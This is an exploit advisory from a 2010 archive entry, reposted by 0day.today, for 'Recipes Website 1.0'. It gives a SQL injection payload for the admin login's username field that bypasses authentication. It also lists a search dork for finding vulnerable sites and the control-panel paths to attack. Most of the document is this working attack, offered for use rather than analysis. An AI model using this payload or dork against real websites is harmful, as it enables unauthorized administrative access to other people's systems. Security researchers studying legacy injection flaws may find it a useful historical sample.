id: 12359
date: 05/22/2010
title: Recipes Website 1.0 SQL Injection Vulnerability
author: Mr.ThieF
cves: 

===============================================
Recipes Website 1.0 SQL Injection Vulnerability
===============================================

[~] Script: | Recipes Website 1.0 |
[~] Author : Mr.ThieF
[~] Contact : LinuxRooT--@hotmail.com <~
[~] DorK : contact_frm.php
[~] Software Link : http://www.scriptsfeed.com
[~] Date : 05-23-2010
[~] Version : 1.0
[~] CVE :
[~] Exploit :
 
UserName : admin ' or ' 1=1  & or & ' or 1='1'#
 
PassworD : xx
 
Example:
 
http://[site]/[path]/Recipes_Website/control/
 
http://[site]/control/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#  0day.today [2023-03-21]  #